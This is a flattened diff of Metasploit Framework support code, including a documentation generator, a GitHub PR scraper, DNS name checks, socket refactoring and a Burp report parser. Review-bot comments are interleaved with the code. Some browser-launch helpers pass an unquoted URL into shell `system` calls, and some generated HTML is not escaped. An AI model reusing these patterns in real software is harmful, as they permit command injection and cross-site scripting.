      | + end + + end + end +end + + +module Msf + module Util + module DocumentGenerator + class DocumentNormalizer + + # + # Markdown templates + # + + CSS_BASE_PATH = 'markdown.css' + HTML_TEMPLATE = 'html_template.erb' + TEMPLATE_PATH = 'default_template.erb' + + # + # Demo templates + # + + REMOTE_EXPLOIT_DEMO_TEMPLATE = 'remote_exploit_demo_template.erb' + BES_DEMO_TEMPLATE = 'bes_demo_template.erb' + HTTPSERVER_DEMO_TEMPLATE = 'httpserver_demo_template.erb' + GENERIC_DEMO_TEMPLATE = 'generic_demo_template.erb' + LOCALEXPLOIT_DEMO_TEMPLATE = 'localexploit_demo_template.erb' + POST_DEMO_TEMPLATE = 'post_demo_template.erb' + AUXILIARY_SCANNER_DEMO_TEMPLATE = 'auxiliary_scanner_template.erb' + PAYLOAD_DEMO_TEMPLATE = 'payload_demo_template.erb' + + + # Returns the module document in HTML form. + # + # @param items [Hash] Items to be documented. + # @param kb [String] Additional information to be added in the doc. + # @return [String] HTML. + def get_md_content(items, kb) + @md_template ||= lambda { + template = '' + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', TEMPLATE_PATH)) + File.open(path, 'rb') { |f| template = f.read } + return template + }.call + md_to_html(ERB.new(@md_template).result(binding()), kb.gsub(/##{number} - #{pr[:title]}" + end + + formatted_pr * "\n" + end + + + # Returns the markdown format for module datastore options. + # + # @param mod_options [Hash] Datastore options + # @return [String] + def normalize_options(mod_options) + required_options = [] + + mod_options.each_pair do |name, props| + if props.required && props.default.nil? + required_options << "* #{name} - #{props.desc}" + end + end + + required_options * "\n" + end + + + # Returns the markdown format for module description. + # + # @param description [String] Module description. 
+ # @return [String] + def normalize_description(description) + Rex::Text.wordwrap(Rex::Text.compress(description)) + end + + + # Returns the markdown format for module authors. + # + # @param authors [Array] Module Authors + # @param authors [String] Module author + # @return [String] + def normalize_authors(authors) + if authors.kind_of?(Array) + authors.collect { |a| "* #{Rex::Text.html_encode(a)}" } * "\n" + else + authors + end + end + + + # Returns the markdown format for module targets. + # + # @param targets [Array] Module targets. + # @return [String] + def normalize_targets(targets) + targets.collect { |c| "* #{c.name}" } * "\n" + end + + + # Returns the markdown format for module references. + # + # @param refs [Array] Module references. + # @return [String] + def normalize_references(refs) + refs.collect { |r| "* #{r}" } * "\n" + end + + + # Returns the markdown format for module platforms. + # + # @param platforms [Array] Module platforms. + # @param platforms [String] Module platform. + # @return [String] + def normalize_platforms(platforms) + if platforms.kind_of?(Array) + platforms.collect { |p| "* #{p}" } * "\n" + else + platforms + end + end + + + # Returns the markdown format for module rank. + # + # @param rank [String] Module rank. + # @return [String] + def normalize_rank(rank) + "[#{Msf::RankingName[rank].capitalize}](https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking)" + end + + + # Returns a parsed demo ERB template. + # + # @param mod [Msf::Module] Metasploit module. + # @param path [String] Template path. + # @return [String] + def load_demo_template(mod, path) + data = '' + path = File.expand_path(File.join(Msf::Config.data_directory, 'markdown_doc', path)) + File.open(path, 'rb') { |f| data = f.read } + ERB.new(data).result(binding()) + end + + + # Returns whether the module is a remote exploit or not. + # + # @param mod [Msf::Module] Metasploit module. + # @return [TrueClass] Module is a remote exploit. 
+ # @return [FalseClass] Module is not really a remote exploit. + def is_remote_exploit?(mod) + # It's actually a little tricky to determine this, so we'll try to be as + # specific as possible. Rather have false negatives than false positives, + # because the worst case would be using the generic demo template. + mod.type == 'exploit' && # Must be an exploit + mod.kind_of?(Msf::Exploit::Remote) && # Should always have this + !mod.kind_of?(Msf::Exploit::FILEFORMAT) && # Definitely not a file format + !mod.kind_of?(Msf::Exploit::Remote::TcpServer) && # If there is a server mixin, things might get complicated + mod.options['DisablePayloadHandler'] # Must allow this option + end + + + # Returns a demo template suitable for the module. Currently supported templates: + # BrowserExploitServer modules, HttpServer modules, local exploit modules, post + # modules, payloads, auxiliary scanner modules. + # + # @param mod [Msf::Module] Metasploit module. + # @return [String] + def normalize_demo_output(mod) + if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer) && mod.shortname != 'browser_autopwn2' + load_demo_template(mod, BES_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Remote::HttpServer) + load_demo_template(mod, HTTPSERVER_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Exploit::Local) + load_demo_template(mod, LOCALEXPLOIT_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Post) + load_demo_template(mod, POST_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Payload) + load_demo_template(mod, PAYLOAD_DEMO_TEMPLATE) + elsif mod.kind_of?(Msf::Auxiliary::Scanner) + load_demo_template(mod, AUXILIARY_SCANNER_DEMO_TEMPLATE) + elsif is_remote_exploit?(mod) + load_demo_template(mod, REMOTE_EXPLOIT_DEMO_TEMPLATE) + else + load_demo_template(mod, GENERIC_DEMO_TEMPLATE) + end + end + + end + end + end +end diff --git a/lib/msf/util/document_generator/pull_request_finder.rb b/lib/msf/util/document_generator/pull_request_finder.rb new file mode 100644 index 0000000000..d509df88bf --- /dev/null 
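Review bot: normalize_authors passes each author through `Rex::Text.html_encode`, but normalize_pull_requests interpolates `pr[:title]` as-is (as far as the extracted text shows), and that title is scraped from github.com by PullRequestFinder, so it is written by whoever opened the pull request. Since the result is rendered to HTML and opened from a file:// URL, the title should be encoded the same way, `#{Rex::Text.html_encode(pr[:title])}`, unless the renderer is configured to escape raw HTML, which cannot be confirmed from this text. normalize_references, normalize_targets and normalize_description leave module-supplied text unencoded as well; making them consistent with normalize_authors costs nothing. The doubled `# @param authors` and `# @param platforms` tags would be clearer as a single tag with a union type, e.g. `# @param authors [Array, String]`.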
+++ b/lib/msf/util/document_generator/pull_request_finder.rb 
@@ -0,0 +1,166 @@ +require 'octokit' +require 'nokogiri' +require 'net/http' + +module Msf + module Util + module DocumentGenerator + + class PullRequestFinder + + class Exception < RuntimeError; end + + MANUAL_BASE_PATH = File.expand_path(File.join(Msf::Config.module_directory, '..', 'documentation', 'modules' )) + + # @return [Octokit::Client] Git client + attr_accessor :git_client + + # @return [String] Metasploit Framework's repository + attr_accessor :repository + + # @return [String] Metasploit Framework's branch + attr_accessor :branch + + # @return [String] Metasploit Framework's repository owner + attr_accessor :owner + + # @return [String] Git access token + attr_accessor :git_access_token + + + # Initializes Msf::Util::DocumenGenerator::PullRequestFinder + # + # @raise [PullRequestFinder::Exception] No GITHUB_OAUTH_TOKEN environment variable + # @return [void] + def initialize + unless ENV.has_key?('GITHUB_OAUTH_TOKEN') + msg = '' + raise PullRequestFinder::Exception, 'GITHUB_OAUTH_TOKEN environment variable not set.' + end + + self.owner = 'rapid7' + self.repository = "#{owner}/metasploit-framework" + self.branch = 'master' + self.git_access_token = ENV['GITHUB_OAUTH_TOKEN'] + self.git_client = Octokit::Client.new(access_token: git_access_token) + end + + + # Returns pull requests associated with a particular Metasploit module. + # + # @param mod [Msf::Module] Metasploit module. + # @return [Hash] + def search(mod) + file_name = get_normalized_module_name(mod) + commits = get_commits_from_file(file_name) + get_pull_requests_from_commits(commits) + end + + + private + + + # Returns the normalized module full name. + # + # @param mod [Msf::Module] Metasploit module. + # @return [String] + def get_normalized_module_name(mod) + source_fname = mod.method(:initialize).source_location.first + source_fname.scan(/(modules.+)/).flatten.first || '' + end + + + # Returns git commits for a particular file. + # + # @param path [String] File path. 
+ # @raise [PullRequestFinder::Exception] No commits found. + # @return [Array] + def get_commits_from_file(path) + begin + commits = git_client.commits(repository, branch, path: path) + rescue Faraday::ConnectionFailed + raise PullRequestFinder::Exception, 'No network connection to Github.' + end + + if commits.empty? + # Possibly the path is wrong. + raise PullRequestFinder::Exception, 'No commits found.' + end + + commits + end + + + # Returns the author for the commit. + # + # @param commit [Sawyer::Resource] + # @return [String] + def get_author(commit) + if commit.author + return commit.author[:login].to_s + end + + '' + end + + + # Checks whether the author should be skipped or not. + # + # @param commit [Sawyer::Resource] + # @return [Boolean] TrueClass if the author should be skipped, otherwise false. + def is_author_blacklisted?(commit) + ['tabassassin'].include?(get_author(commit)) + end + + + # Returns unique pull requests for a collection of commits. + # + # @param commits [Array] + # @return [Hash] + def get_pull_requests_from_commits(commits) + pull_requests = {} + + commits.each do |commit| + next if is_author_blacklisted?(commit) + + pr = get_pull_request_from_commit(commit) + unless pr.empty? + pull_requests[pr[:number]] = pr + end + end + + pull_requests + end + + + # Returns unique pull requests for a commit. + # + # @param commit [Sawyer::Resource] + # @return [Hash] + def get_pull_request_from_commit(commit) + sha = commit.sha + url = URI.parse("https://github.com/#{repository}/branch_commits/#{sha}") + cli = Net::HTTP.new(url.host, url.port) + cli.use_ssl = true + req = Net::HTTP::Get.new(url.request_uri) + res = cli.request(req) + n = Nokogiri::HTML(res.body) + found_pr_link = n.at('li[@class="pull-request"]//a') + + # If there is no PR associated with this commit, it's probably from the SVN days. 
+ return {} unless found_pr_link + + href = found_pr_link.attributes['href'].text + title = found_pr_link.attributes['title'].text + + # Filter out all the pull requests that do not belong to rapid7. + # If this happens, it's probably because the PR was submitted to somebody's fork. + return {} unless /^\/#{owner}\// === href + + { number: href.scan(/\d+$/).flatten.first, title: title } + end + end + + end + end +end diff --git a/lib/msf/util/svn.rb b/lib/msf/util/svn.rb deleted file mode 100644 index 8b5f10175a..0000000000 --- a/lib/msf/util/svn.rb +++ /dev/null @@ -1,120 +0,0 @@ -# -*- coding: binary -*- -### -# -# framework-util-svn -# -------------- -# -# The class provides methods for parsing the SVN information in the framework directory -# -### - -require 'date' - -module Msf -module Util -class SVN - - def self.load_root - info = {} - path = ::File.join(::File.dirname(__FILE__), "..", "..", "..", ".svn", "entries") - if !::File.exists?(path) - return info - end - contents = '' - File.open(path, "rb") do |fd| - contents = fd.read(::File.size(path)) - end - if contents.include? " 7) - "%red#{diff.to_i} days ago%clr" - else - "#{diff.to_i} days ago" - end - end - end - - def self.last_updated_date - @@info ||= load_root - svnt = @@info[:updated] - if(not svnt) - return - end - begin - Date.parse(@@info[:updated]) - rescue ArgumentError - end - end - -end -end -end - diff --git a/lib/net/dns/names/names.rb b/lib/net/dns/names/names.rb index d65c8bf293..b483368877 100644 --- a/lib/net/dns/names/names.rb +++ b/lib/net/dns/names/names.rb @@ -46,12 +46,15 @@ module Net # :nodoc: end def pack_name(name) - if name.size > 63 - raise ArgumentError, "Label data cannot exceed 63 chars" + if name.size > 255 + raise ArgumentError, "Name data cannot exceed 255 chars" end arr = name.split(".") str = "" arr.each do |elem| + if elem.size > 63 + raise ArgumentError, "Label data cannot exceed 63 chars" + end str += [elem.size,elem].pack("Ca*") end str += [0].pack("C") 
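Review bot: get_pull_request_from_commit issues one HTTPS request per commit with no timeouts, no rescue and no status check, then parses whatever body came back. Only `Faraday::ConnectionFailed` is translated into `PullRequestFinder::Exception`, and get_module_document rescues only that class, so a DNS failure, timeout or TLS error here escapes into the console command, while an error or rate-limit page is silently read as "no pull request". I would bound the request, check `res` and re-raise as `PullRequestFinder::Exception`, as sketched below. Smaller points: `msg = ''` in initialize is unused, and the owner filter should anchor with `\A` rather than `^` (`%r{\A/#{Regexp.escape(owner)}/}`) because `href` is remote input.

```ruby
def get_pull_request_from_commit(commit)
  # … unchanged: sha, url, Net::HTTP.new, use_ssl …
  cli.open_timeout = 10
  cli.read_timeout = 10
  req = Net::HTTP::Get.new(url.request_uri)

  begin
    res = cli.request(req)
  rescue ::SocketError, ::SystemCallError, ::Timeout::Error, ::OpenSSL::SSL::SSLError => e
    raise PullRequestFinder::Exception, "Unable to query Github: #{e.class}"
  end

  # Anything but a 2xx is not a commit page; do not try to parse it.
  return {} unless res.kind_of?(Net::HTTPSuccess)

  # … unchanged: Nokogiri parsing, PR link lookup, owner filter …
```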
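Review bot: The new length checks in pack_name still accept names that cannot be encoded correctly. An empty label (`"a..b"` or a leading dot) packs a zero length byte in the middle of the name, which a parser reads as the terminator. `name.size > 255` is also measured on the dotted string, while the 255-octet limit applies to the encoded form, which is up to two bytes longer. Rejecting empty labels inside the loop (`raise ArgumentError, "Empty label" if elem.empty?`) and comparing against 253, or against the packed length, closes both gaps. The end of pack_name lies outside the hunk.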
diff --git a/lib/net/ssh/transport/session.rb b/lib/net/ssh/transport/session.rb index 3bd4e33f66..515c681901 100644 --- a/lib/net/ssh/transport/session.rb +++ b/lib/net/ssh/transport/session.rb @@ -65,9 +65,10 @@ module Net; module SSH; module Transport factory = options[:proxy] if (factory) - @socket = timeout(options[:timeout] || 0) { factory.open(@host, @port) } + @socket = ::Timeout.timeout(options[:timeout] || 0) { factory.open(@host, +@port) } else - @socket = timeout(options[:timeout] || 0) { + @socket = ::Timeout.timeout(options[:timeout] || 0) { Rex::Socket::Tcp.create( 'PeerHost' => @host, 'PeerPort' => @port, diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb index 46d61dae15..4a4564a7a5 100644 --- a/lib/rex/compat.rb +++ b/lib/rex/compat.rb @@ -149,8 +149,6 @@ def self.open_browser(url='http://google.com/') end def self.open_webrtc_browser(url='http://google.com/') - found_browser = false - case RUBY_PLATFORM when /mswin2|mingw|cygwin/ paths = [ @@ -169,9 +167,8 @@ def self.open_webrtc_browser(url='http://google.com/') paths.each do |path| if File.exists?(path) args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : "" - system("#{path} #{args} #{url}") - found_browser = true - break + system("\"#{path}\" #{args} \"#{url}\"") + return true end end 
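Review bot: In session.rb the first replacement line is split after `factory.open(@host,` with `@port) }` starting at column 0 on the next line, which looks like an accidental wrap. It still parses, but it should be rejoined as `@socket = ::Timeout.timeout(options[:timeout] || 0) { factory.open(@host, @port) }` to match the surrounding indentation.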
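Review bot: In compat.rb, `system("\"#{path}\" #{args} \"#{url}\"")` still builds a single shell string, and wrapping `url` in double quotes does not neutralise a `"` or other shell metacharacters inside it; the macOS and Linux branches in the next hunk interpolate `url` with no quoting at all. open_webrtc_browser takes `url` from its caller, so passing the arguments as a list avoids the shell entirely, e.g. `system(path, *args.split, url)` here and `Process.detach(spawn(browser_path, *args.split, url))` where the current code backgrounds with `&`. The method starts before this hunk and continues past it.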
@@ -182,27 +179,25 @@ def self.open_webrtc_browser(url='http://google.com/') args = (browser_path =~ /Chrome/) ? "--args --allow-file-access-from-files" : "" system("open #{url} -a \"#{browser_path}\" #{args} &") - found_browser = true - break + return true end end else if defined? ENV['PATH'] - ['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser| + ['google-chrome', 'chrome', 'chromium', 'firefox' , 'firefox', 'opera'].each do |browser| ENV['PATH'].split(':').each do |path| browser_path = "#{path}/#{browser}" if File.exists?(browser_path) args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : "" system("#{browser_path} #{args} #{url} &") - found_browser = true - break + return true end end end end end - found_browser + false end def self.open_email(addr) diff --git a/lib/rex/exploitation/js/memory.rb b/lib/rex/exploitation/js/memory.rb index f8fb22c77e..a0a9d08e78 100644 --- a/lib/rex/exploitation/js/memory.rb +++ b/lib/rex/exploitation/js/memory.rb @@ -27,7 +27,7 @@ class Memory def self.heaplib2(custom_js='', opts={}) js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heaplib2.js")) - unless custom_js.blank? + unless custom_js.to_s.strip.empty? js << custom_js end diff --git a/lib/rex/io/datagram_abstraction.rb b/lib/rex/io/datagram_abstraction.rb index e1b17a1d6c..bf9492dfa2 100644 --- a/lib/rex/io/datagram_abstraction.rb +++ b/lib/rex/io/datagram_abstraction.rb @@ -1,6 +1,6 @@ # -*- coding: binary -*- -require 'socket' +require 'rex/io/socket_abstraction' module Rex module IO 
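Review bot: The reordered browser list on the added line still names `'firefox'` twice and has a stray space before the comma; `%w[google-chrome chrome chromium firefox opera]` lists each candidate once. In the same loop the context line `args = (browser_path =~ /Chrome/) ? ...` is case-sensitive while every candidate name is lowercase, so the flag appears to be applied only when a PATH directory itself contains `Chrome`; if it is meant to apply, `/chrom(e|ium)/i` matches the names actually searched. The guard `if defined? ENV['PATH']` is always truthy and could be `if ENV['PATH']`.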
@@ -12,24 +12,15 @@ module IO # ### module DatagramAbstraction + include Rex::IO::SocketAbstraction # # Creates a streaming socket pair # def initialize_abstraction - self.lsock, self.rsock = Rex::Socket.udp_socket_pair() + self.lsock, self.rsock = Rex::Socket.udp_socket_pair end - - # The left side of the stream (local) - attr_reader :lsock - # The right side of the stream (remote) - attr_reader :rsock - -protected - attr_writer :lsock - attr_writer :rsock - end end; end diff --git a/lib/rex/io/socket_abstraction.rb b/lib/rex/io/socket_abstraction.rb new file mode 100644 index 0000000000..c010c8a1b9 --- /dev/null +++ b/lib/rex/io/socket_abstraction.rb 
@@ -0,0 +1,205 @@ +# -*- coding: binary -*- + +require 'socket' +require 'fcntl' + +module Rex +module IO + +### +# +# This class provides an abstraction to a stream based +# connection through the use of a streaming socketpair. +# +### +module SocketAbstraction + + ### + # + # Extension information for required Stream interface. + # + ### + module Ext + + # + # Initializes peer information. + # + def initinfo(peer,local) + @peer = peer + @local = local + end + + # + # Symbolic peer information. + # + def peerinfo + (@peer || "Remote Pipe") + end + + # + # Symbolic local information. + # + def localinfo + (@local || "Local Pipe") + end + end + + # + # Override this method to init the abstraction + # + def initialize_abstraction + self.lsock, self.rsock = Rex::Compat.pipe + end + + # + # This method cleans up the abstraction layer. + # + def cleanup_abstraction + self.lsock.close if (self.lsock and !self.lsock.closed?) + self.rsock.close if (self.rsock and !self.rsock.closed?) + + self.lsock = nil + self.rsock = nil + end + + # + # Low-level write to the local side. + # + def syswrite(buffer) + lsock.syswrite(buffer) + end + + # + # Low-level read from the local side. + # + def sysread(length) + lsock.sysread(length) + end + + # + # Shuts down the local side of the stream abstraction. + # + def shutdown(how) + lsock.shutdown(how) + end + + # + # Closes both sides of the stream abstraction. + # + def close + cleanup_abstraction + super + end + + # + # Symbolic peer information. + # + def peerinfo + "Remote-side of Pipe" + end + + # + # Symbolic local information. + # + def localinfo + "Local-side of Pipe" + end + + # + # The left side of the stream. + # + attr_reader :lsock + # + # The right side of the stream. 
+ # + attr_reader :rsock + +protected + + def monitor_rsock(threadname = "SocketMonitorRemote") + self.monitor_thread = Rex::ThreadFactory.spawn(threadname, false) { + loop do + closed = false + buf = nil + + if not self.rsock + wlog("monitor_rsock: the remote socket is nil, exiting loop") + break + end + + begin + s = Rex::ThreadSafe.select( [ self.rsock ], nil, nil, 0.2 ) + if( s == nil || s[0] == nil ) + next + end + rescue Exception => e + wlog("monitor_rsock: exception during select: #{e.class} #{e}") + closed = true + end + + if( closed == false ) + begin + buf = self.rsock.sysread( 32768 ) + if buf == nil + closed = true + wlog("monitor_rsock: closed remote socket due to nil read") + end + rescue EOFError => e + closed = true + dlog("monitor_rsock: EOF in rsock") + rescue ::Exception => e + closed = true + wlog("monitor_rsock: exception during read: #{e.class} #{e}") + end + end + + if( closed == false ) + total_sent = 0 + total_length = buf.length + while( total_sent < total_length ) + begin + data = buf[total_sent, buf.length] + + # Note that this must be write() NOT syswrite() or put() or anything like it. + # Using syswrite() breaks SSL streams. + sent = self.write( data ) + + # sf: Only remove the data off the queue is write was successfull. + # This way we naturally perform a resend if a failure occured. + # Catches an edge case with meterpreter TCP channels where remote send + # failes gracefully and a resend is required. + if (sent.nil?) + closed = true + wlog("monitor_rsock: failed writing, socket must be dead") + break + elsif (sent > 0) + total_sent += sent + end + rescue ::IOError, ::EOFError => e + closed = true + wlog("monitor_rsock: exception during write: #{e.class} #{e}") + break + end + end + end + + if( closed ) + begin + self.close_write if self.respond_to?('close_write') + rescue IOError + end + break + end + end + } + end + +protected + attr_accessor :monitor_thread + attr_writer :lsock + attr_writer :rsock + +end + +end; end + 
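Review bot: `monitor_rsock` rescues `Exception` around the `select` call and `::Exception` around `sysread`, which also traps `NoMemoryError`, `SystemExit` and signal exceptions inside the monitor thread and turns them into a logged close. `rescue ::StandardError => e` in both places keeps the logging and the `closed = true` path for I/O errors without masking process-level conditions. In the write loop, a `write` that returns 0 leaves `total_sent` unchanged and retries at once with no delay or retry bound, so a peer that never drains keeps this thread spinning; a short sleep or a retry cap would bound it. The header comment also calls this module a class.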
diff --git a/lib/rex/io/stream_abstraction.rb b/lib/rex/io/stream_abstraction.rb index c2bfb5d4a2..837cfd945a 100644 --- a/lib/rex/io/stream_abstraction.rb +++ b/lib/rex/io/stream_abstraction.rb @@ -1,7 +1,6 @@ # -*- coding: binary -*- -require 'socket' -require 'fcntl' +require 'rex/io/socket_abstraction' module Rex module IO @@ -13,36 +12,7 @@ module IO # ### module StreamAbstraction - - ### - # - # Extension information for required Stream interface. - # - ### - module Ext - - # - # Initializes peer information. - # - def initinfo(peer,local) - @peer = peer - @local = local - end - - # - # Symbolic peer information. - # - def peerinfo - (@peer || "Remote Pipe") - end - - # - # Symbolic local information. - # - def localinfo - (@local || "Local Pipe") - end - end + include Rex::IO::SocketAbstraction # # This method creates a streaming socket pair and initializes it. 
@@ -53,156 +23,9 @@ module StreamAbstraction self.lsock.extend(Ext) self.rsock.extend(Rex::IO::Stream) - self.monitor_rsock + self.monitor_rsock("StreamMonitorRemote") end - # - # This method cleans up the abstraction layer. - # - def cleanup_abstraction - self.lsock.close if (self.lsock) - self.rsock.close if (self.rsock) - - self.lsock = nil - self.rsock = nil - end - - # - # Low-level write to the local side. - # - def syswrite(buffer) - lsock.syswrite(buffer) - end - - # - # Low-level read from the local side. - # - def sysread(length) - lsock.sysread(length) - end - - # - # Shuts down the local side of the stream abstraction. - # - def shutdown(how) - lsock.shutdown(how) - end - - # - # Closes both sides of the stream abstraction. - # - def close - cleanup_abstraction - end - - # - # Symbolic peer information. - # - def peerinfo - "Remote-side of Pipe" - end - - # - # Symbolic local information. - # - def localinfo - "Local-side of Pipe" - end - - # - # The left side of the stream. - # - attr_reader :lsock - # - # The right side of the stream. 
- # - attr_reader :rsock - -protected - - def monitor_rsock - self.monitor_thread = Rex::ThreadFactory.spawn("StreamMonitorRemote", false) { - loop do - closed = false - buf = nil - - if not self.rsock - wlog("monitor_rsock: the remote socket is nil, exiting loop") - break - end - - begin - s = Rex::ThreadSafe.select( [ self.rsock ], nil, nil, 0.2 ) - if( s == nil || s[0] == nil ) - next - end - rescue Exception => e - wlog("monitor_rsock: exception during select: #{e.class} #{e}") - closed = true - end - - if( closed == false ) - begin - buf = self.rsock.sysread( 32768 ) - if buf == nil - closed = true - wlog("monitor_rsock: closed remote socket due to nil read") - end - rescue EOFError => e - closed = true - dlog("monitor_rsock: EOF in rsock") - rescue ::Exception => e - closed = true - wlog("monitor_rsock: exception during read: #{e.class} #{e}") - end - end - - if( closed == false ) - total_sent = 0 - total_length = buf.length - while( total_sent < total_length ) - begin - data = buf[total_sent, buf.length] - - # Note that this must be write() NOT syswrite() or put() or anything like it. - # Using syswrite() breaks SSL streams. - sent = self.write( data ) - - # sf: Only remove the data off the queue is write was successfull. - # This way we naturally perform a resend if a failure occured. - # Catches an edge case with meterpreter TCP channels where remote send - # failes gracefully and a resend is required. - if (sent.nil?) - closed = true - wlog("monitor_rsock: failed writing, socket must be dead") - break - elsif (sent > 0) - total_sent += sent - end - rescue ::IOError, ::EOFError => e - closed = true - wlog("monitor_rsock: exception during write: #{e.class} #{e}") - break - end - end - end - - if( closed ) - begin - self.close_write if self.respond_to?('close_write') - rescue IOError - end - break - end - end - } - end - -protected - attr_accessor :monitor_thread - attr_writer :lsock - attr_writer :rsock - end end; end 
diff --git a/lib/rex/mime/message.rb b/lib/rex/mime/message.rb index 150a7c081b..205f561350 100644 --- a/lib/rex/mime/message.rb +++ b/lib/rex/mime/message.rb @@ -126,7 +126,7 @@ class Message header_string = self.header.to_s msg = header_string.empty? ? '' : force_crlf(self.header.to_s + "\r\n") - msg << force_crlf(self.content + "\r\n") unless self.content.blank? + msg << force_crlf(self.content + "\r\n") unless self.content.to_s.strip.empty? self.parts.each do |part| msg << force_crlf("--" + self.bound + "\r\n") diff --git a/lib/rex/parser/appscan_nokogiri.rb b/lib/rex/parser/appscan_nokogiri.rb index 438eb9cb6a..fa9641e2af 100644 --- a/lib/rex/parser/appscan_nokogiri.rb +++ b/lib/rex/parser/appscan_nokogiri.rb @@ -195,7 +195,7 @@ module Rex res_header = Rex::Proto::Http::Packet::Header.new req_header.from_s request_headers.lstrip res_header.from_s response_headers.lstrip - if response_body.blank? + if response_body.to_s.empty? response_body = '' end @state[:request_headers] = req_header diff --git a/lib/rex/parser/burp_issue_nokogiri.rb b/lib/rex/parser/burp_issue_nokogiri.rb new file mode 100644 index 0000000000..c14ec9c869 --- /dev/null +++ b/lib/rex/parser/burp_issue_nokogiri.rb 
@@ -0,0 +1,139 @@ +# -*- coding: binary -*- +require "rex/parser/nokogiri_doc_mixin" +require 'uri' + +module Rex + module Parser + + # If Nokogiri is available, define Burp Issue document class. + load_nokogiri && class BurpIssueDocument < Nokogiri::XML::SAX::Document + + include NokogiriDocMixin + + def start_element(name=nil,attrs=[]) + attrs = normalize_attrs(attrs) + block = @block + @state[:current_tag][name] = true + case name + when "host", "name", "info", "issueDetail", "references" + @state[:has_text] = true + end + end + + def end_element(name=nil) + block = @block + case name + when "issue" + report_web_host_info + report_web_service_info + report_vuln + # Reset the state once we close a host + @state = @state.select {|k| [:current_tag].include? k} + when "host" + @state[:has_text] = false + collect_host_info + @text = nil + when "name" + @state[:has_text] = false + collect_name + @text = nil + when "issueDetail" + @state[:has_text] = false + collect_issue_detail + @text = nil + when "references" + @state[:has_text] = false + collect_references + @text = nil + end + @state[:current_tag].delete name + end + + def collect_host_info + return unless in_issue + return unless has_text + uri = URI(@text) + + @state[:host] = uri.host + @state[:service_name] = uri.scheme + @state[:proto] = "tcp" + + case @state[:service_name] + when "http" + @state[:port] = 80 + when "https" + @state[:port] = 443 + end + end + + def collect_name + return unless in_issue + return unless has_text + @state[:vuln_name] = @text + end + + def collect_issue_detail + return unless in_issue + return unless has_text + @state[:issue_detail] = @text + end + + def collect_references + return unless in_issue + return unless has_text + uri = @text.match('href=[\'"]?([^\'" >]+)')[1] + @state[:refs] = ["URI-#{uri}"] + end + + def report_web_host_info + return unless @state[:host] + address = Rex::Socket.resolv_to_dotted(@state[:host]) rescue nil + host_info = {:workspace => @args[:wspace]} + 
host_info[:address] = address + host_info[:name] = @state[:host] + db_report(:host, host_info) + end + + def report_web_service_info + return unless @state[:host] + return unless @state[:port] + return unless @state[:proto] + return unless @state[:service_name] + service_info = {} + service_info[:host] = @state[:host] + service_info[:port] = @state[:port] + service_info[:proto] = @state[:proto] + service_info[:name] = @state[:service_name] + @state[:service_object] = db_report(:service, service_info) + end + + def report_vuln + return unless @state[:service_object] + return unless @state[:vuln_name] + return unless @state[:issue_detail] + return unless @state[:refs] + vuln_info = {} + vuln_info[:service_id] = @state[:service_object].id + vuln_info[:host] = @state[:host] + vuln_info[:name] = @state[:vuln_name] + vuln_info[:info] = @state[:issue_detail] + vuln_info[:refs] = @state[:refs] + @state[:vuln_object] = db_report(:vuln, vuln_info) + end + + def in_issue + return false unless in_tag("issue") + return false unless in_tag("issues") + return true + end + + def has_text + return false unless @text + return false if @text.strip.empty? + @text = @text.strip + end + end + + end +end + diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb index 2822fa28bf..057c5dae53 100644 --- a/lib/rex/parser/burp_session_nokogiri.rb +++ b/lib/rex/parser/burp_session_nokogiri.rb @@ -157,7 +157,7 @@ module Rex host_info = {:workspace => @args[:wspace]} host_info[:address] = @state[:web_site].service.host.address host_info[:name] = @state[:uri].host - report_db(:host, host_info) + db_report(:host, host_info) end def report_web_service_info diff --git a/lib/rex/parser/fusionvm_nokogiri.rb b/lib/rex/parser/fusionvm_nokogiri.rb index 8af80d5747..a328a895bb 100644 --- a/lib/rex/parser/fusionvm_nokogiri.rb +++ b/lib/rex/parser/fusionvm_nokogiri.rb 
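Review bot: `collect_references` indexes the result of `@text.match(...)` directly, so a `<references>` element whose text has no `href=` raises NoMethodError on nil in the middle of the SAX parse of an imported file. Guarding the match keeps a malformed or hostile report from aborting the import: `m = @text.match(/href=['"]?([^'" >]+)/)` followed by `@state[:refs] = ["URI-#{m[1]}"] if m`. `collect_host_info` has the same shape: `URI(@text)` raises `URI::InvalidURIError` on a malformed `<host>` value, and any scheme other than http/https leaves `@state[:port]` unset, which silently drops the service and the vuln. `report_web_host_info` resolves the hostname taken from the file (`resolv_to_dotted ... rescue nil`), so importing a report triggers DNS lookups for names the report author chose; a comment stating that would help.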
@@ -59,7 +59,7 @@ module Parser unless in_tag("JobOrder") case name when "OS" - unless @host.nil? or @text.blank? + unless @host.nil? or @text.to_s.strip.empty? tnote = { :type => "host.os.fusionvm_fingerprint", :data => { :os => @text.strip }, @@ -86,7 +86,7 @@ module Parser when "CVE" @vuln[:refs] << "CVE-#{@text.strip}" when "References" - unless @text.blank? + unless @text.to_s.strip.empty? @text.split(' ').each do |ref| next unless ref.start_with? "http" if ref =~ /MS\d{2}-\d{3}/ diff --git a/lib/rex/parser/nexpose_raw_nokogiri.rb b/lib/rex/parser/nexpose_raw_nokogiri.rb index 3d5ec218b1..78a681dba8 100644 --- a/lib/rex/parser/nexpose_raw_nokogiri.rb +++ b/lib/rex/parser/nexpose_raw_nokogiri.rb @@ -193,6 +193,13 @@ module Rex vuln_instances = @report_data[:vuln][:matches].size db.emit(:vuln, [refs.last,vuln_instances], &block) if block + # TODO: potential remove the size limit on this field, might require + # some additional UX + if @report_data[:vuln]['title'].length > 255 + db.emit :warning, 'Vulnerability name longer than 255 characters, truncating.', &block if block + @report_data[:vuln]['title'] = @report_data[:vuln]['title'][0..254] + end + vuln_ids = @report_data[:vuln][:matches].map{ |v| v[0] } vdet_ids = @report_data[:vuln][:matches].map{ |v| v[1] } diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb 